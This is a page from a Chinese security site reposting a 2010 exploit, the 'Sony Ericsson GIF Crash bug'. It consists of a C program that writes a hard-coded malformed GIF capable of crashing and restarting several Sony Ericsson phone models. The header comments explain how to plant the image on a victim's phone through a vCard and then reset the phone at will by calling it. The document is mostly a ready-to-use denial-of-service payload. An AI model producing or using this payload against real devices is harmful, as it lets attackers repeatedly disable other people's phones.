首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sony Ericsson GIF Crash bug
来源:vfocus.net 作者:Le-Quack 发布时间:2010-06-08   
// ,-------------------------------------------,
// | [+] Title: Sony Ericsson GIF Crash bug    |
// | [+] Date: 2010-06-07                      |
// | [+] Author: Le Quack                      |
// | [+] Version: All Sony Ericssons from Txxx |
// | [+] Tested on: T630, K750i, W610i         |
// | [+] Category: Local                       |
// `-------------------------------------------'

// ,--------------------------------------------------------------------------------------------------,
// | Any attempt to show generated image will crash the phone (white screen and restart).             |
// | It is also possible to create a vCard containing this image (Google), that will be automatically |
// | saved in the images' main directory just after accepting our vCard by victim. Of course you can  |
// | include your phone number and reset victim's phone whenever you want (just call him). The only   |
// | way to get rid of this file is deleting it by cable/bluetooth (or just format a memory).         |
// `--------------------------------------------------------------------------------------------------'

#include <stdio.h>

using namespace std;

int main(int argc, char **argv)
{
    unsigned char data[] =
    {
    0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x01, 0x00, 0x01, 0x00, 0xF7, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0x00, 0x80, 0x80, 0x00, 0x80, 0x00,
    0x80, 0x80, 0x80, 0x80, 0x80, 0xC0, 0xC0, 0xC0, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0x00, 0xFF, 0xFF,
    0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x00, 0x66, 0x00, 0x00,
    0x99, 0x00, 0x00, 0xCC, 0x00, 0x00, 0xFF, 0x00, 0x33, 0x00, 0x00, 0x33, 0x33, 0x00, 0x33, 0x66,
    0x00, 0x33, 0x99, 0x00, 0x33, 0xCC, 0x00, 0x33, 0xFF, 0x00, 0x66, 0x00, 0x00, 0x66, 0x33, 0x00,
    0x66, 0x66, 0x00, 0x66, 0x99, 0x00, 0x66, 0xCC, 0x00, 0x66, 0xFF, 0x00, 0x99, 0x00, 0x00, 0x99,
    0x33, 0x00, 0x99, 0x66, 0x00, 0x99, 0x99, 0x00, 0x99, 0xCC, 0x00, 0x99, 0xFF, 0x00, 0xCC, 0x00,
    0x00, 0xCC, 0x33, 0x00, 0xCC, 0x66, 0x00, 0xCC, 0x99, 0x00, 0xCC, 0xCC, 0x00, 0xCC, 0xFF, 0x00,
    0xFF, 0x00, 0x00, 0xFF, 0x33, 0x00, 0xFF, 0x66, 0x00, 0xFF, 0x99, 0x00, 0xFF, 0xCC, 0x00, 0xFF,
    0xFF, 0x33, 0x00, 0x00, 0x33, 0x00, 0x33, 0x33, 0x00, 0x66, 0x33, 0x00, 0x99, 0x33, 0x00, 0xCC,
    0x33, 0x00, 0xFF, 0x33, 0x33, 0x00, 0x33, 0x33, 0x33, 0x33, 0x33, 0x66, 0x33, 0x33, 0x99, 0x33,
    0x33, 0xCC, 0x33, 0x33, 0xFF, 0x33, 0x66, 0x00, 0x33, 0x66, 0x33, 0x33, 0x66, 0x66, 0x33, 0x66,
    0x99, 0x33, 0x66, 0xCC, 0x33, 0x66, 0xFF, 0x33, 0x99, 0x00, 0x33, 0x99, 0x33, 0x33, 0x99, 0x66,
    0x33, 0x99, 0x99, 0x33, 0x99, 0xCC, 0x33, 0x99, 0xFF, 0x33, 0xCC, 0x00, 0x33, 0xCC, 0x33, 0x33,
    0xCC, 0x66, 0x33, 0xCC, 0x99, 0x33, 0xCC, 0xCC, 0x33, 0xCC, 0xFF, 0x33, 0xFF, 0x00, 0x33, 0xFF,
    0x33, 0x33, 0xFF, 0x66, 0x33, 0xFF, 0x99, 0x33, 0xFF, 0xCC, 0x33, 0xFF, 0xFF, 0x66, 0x00, 0x00,
    0x66, 0x00, 0x33, 0x66, 0x00, 0x66, 0x66, 0x00, 0x99, 0x66, 0x00, 0xCC, 0x66, 0x00, 0xFF, 0x66,
    0x33, 0x00, 0x66, 0x33, 0x33, 0x66, 0x33, 0x66, 0x66, 0x33, 0x99, 0x66, 0x33, 0xCC, 0x66, 0x33,
    0xFF, 0x66, 0x66, 0x00, 0x66, 0x66, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x99, 0x66, 0x66, 0xCC,
    0x66, 0x66, 0xFF, 0x66, 0x99, 0x00, 0x66, 0x99, 0x33, 0x66, 0x99, 0x66, 0x66, 0x99, 0x99, 0x66,
    0x99, 0xCC, 0x66, 0x99, 0xFF, 0x66, 0xCC, 0x00, 0x66, 0xCC, 0x33, 0x66, 0xCC, 0x66, 0x66, 0xCC,
    0x99, 0x66, 0xCC, 0xCC, 0x66, 0xCC, 0xFF, 0x66, 0xFF, 0x00, 0x66, 0xFF, 0x33, 0x66, 0xFF, 0x66,
    0x66, 0xFF, 0x99, 0x66, 0xFF, 0xCC, 0x66, 0xFF, 0xFF, 0x99, 0x00, 0x00, 0x99, 0x00, 0x33, 0x99,
    0x00, 0x66, 0x99, 0x00, 0x99, 0x99, 0x00, 0xCC, 0x99, 0x00, 0xFF, 0x99, 0x33, 0x00, 0x99, 0x33,
    0x33, 0x99, 0x33, 0x66, 0x99, 0x33, 0x99, 0x99, 0x33, 0xCC, 0x99, 0x33, 0xFF, 0x99, 0x66, 0x00,
    0x99, 0x66, 0x33, 0x99, 0x66, 0x66, 0x99, 0x66, 0x99, 0x99, 0x66, 0xCC, 0x99, 0x66, 0xFF, 0x99,
    0x99, 0x00, 0x99, 0x99, 0x33, 0x99, 0x99, 0x66, 0x99, 0x99, 0x99, 0x99, 0x99, 0xCC, 0x99, 0x99,
    0xFF, 0x99, 0xCC, 0x00, 0x99, 0xCC, 0x33, 0x99, 0xCC, 0x66, 0x99, 0xCC, 0x99, 0x99, 0xCC, 0xCC,
    0x99, 0xCC, 0xFF, 0x99, 0xFF, 0x00, 0x99, 0xFF, 0x33, 0x99, 0xFF, 0x66, 0x99, 0xFF, 0x99, 0x99,
    0xFF, 0xCC, 0x99, 0xFF, 0xFF, 0xCC, 0x00, 0x00, 0xCC, 0x00, 0x33, 0xCC, 0x00, 0x66, 0xCC, 0x00,
    0x99, 0xCC, 0x00, 0xCC, 0xCC, 0x00, 0xFF, 0xCC, 0x33, 0x00, 0xCC, 0x33, 0x33, 0xCC, 0x33, 0x66,
    0xCC, 0x33, 0x99, 0xCC, 0x33, 0xCC, 0xCC, 0x33, 0xFF, 0xCC, 0x66, 0x00, 0xCC, 0x66, 0x33, 0xCC,
    0x66, 0x66, 0xCC, 0x66, 0x99, 0xCC, 0x66, 0xCC, 0xCC, 0x66, 0xFF, 0xCC, 0x99, 0x00, 0xCC, 0x99,
    0x33, 0xCC, 0x99, 0x66, 0xCC, 0x99, 0x99, 0xCC, 0x99, 0xCC, 0xCC, 0x99, 0xFF, 0xCC, 0xCC, 0x00,
    0xCC, 0xCC, 0x33, 0xCC, 0xCC, 0x66, 0xCC, 0xCC, 0x99, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xFF, 0xCC,
    0xFF, 0x00, 0xCC, 0xFF, 0x33, 0xCC, 0xFF, 0x66, 0xCC, 0xFF, 0x99, 0xCC, 0xFF, 0xCC, 0xCC, 0xFF,
    0xFF, 0xFF, 0x00, 0x00, 0xFF, 0x00, 0x33, 0xFF, 0x00, 0x66, 0xFF, 0x00, 0x99, 0xFF, 0x00, 0xCC,
    0xFF, 0x00, 0xFF, 0xFF, 0x33, 0x00, 0xFF, 0x33, 0x33, 0xFF, 0x33, 0x66, 0xFF, 0x33, 0x99, 0xFF,
    0x33, 0xCC, 0xFF, 0x33, 0xFF, 0xFF, 0x66, 0x00, 0xFF, 0x66, 0x33, 0xFF, 0x66, 0x66, 0xFF, 0x66,
    0x99, 0xFF, 0x66, 0xCC, 0xFF, 0x66, 0xFF, 0xFF, 0x99, 0x00, 0xFF, 0x99, 0x33, 0xFF, 0x99, 0x66,
    0xFF, 0x99, 0x99, 0xFF, 0x99, 0xCC, 0xFF, 0x99, 0xFF, 0xFF, 0xCC, 0x00, 0xFF, 0xCC, 0x33, 0xFF,
    0xCC, 0x66, 0xFF, 0xCC, 0x99, 0xFF, 0xCC, 0xCC, 0xFF, 0xCC, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
    0x33, 0xFF, 0xFF, 0x66, 0xFF, 0xFF, 0x99, 0xFF, 0xFF, 0xCC, 0xFF, 0xFF, 0xFF, 0x21, 0xF9, 0x04,
    0x01, 0x00, 0x00, 0x10, 0x00, 0x2C, 0xF0, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
    0x04, 0x00, 0xFF, 0x05, 0x04, 0x00, 0x3B,
    } ;

    printf("\n[+] Sony Ericsson GIF Crash bug\n");
    printf("[+] Coded and discovered by Le Quack <le.quack_ftw@yahoo.com>\n");
    printf("[+] Generated file should work with models from Txxx, tested on T630, K750i, W610i\n\n");

    if(argc != 2)
    {
        printf("[+] Usage: %s <filename.gif>\n", argv[0]);
        return 0;
    }

    FILE* pFile;
    pFile = fopen(argv[1], "wb");
    if(pFile == NULL)
    {
        printf("[-] Error creating file. Exiting.");
        return 0;
    }

    fwrite(data, 1, sizeof(data), pFile);

    printf("[+] File has been saved as \"%s\"\n", argv[1]);
    printf("[+] Written %d bytes\n", sizeof(data));

    fclose(pFile);

    return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·45 bytes give all user root ac
·VUPlayer <=2.49 .M3u Universal
·48 bytes chown root:root /bin/
·Audio Converter 8.1 0day Stack
·OS X EvoCam Web Server Buffer
·Easy CD-DA Recorder 2007 SEH B
·linux/x86 displaying system te
·SureThing CD Labeler (m3u/pls)
·Pixelpost Add Admin Exploit (h
·Castripper 2.50.70 (.pls) stac
·linux/x86 force unmount "/medi
·Motorola SB5101 Hax0rware Rajk
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved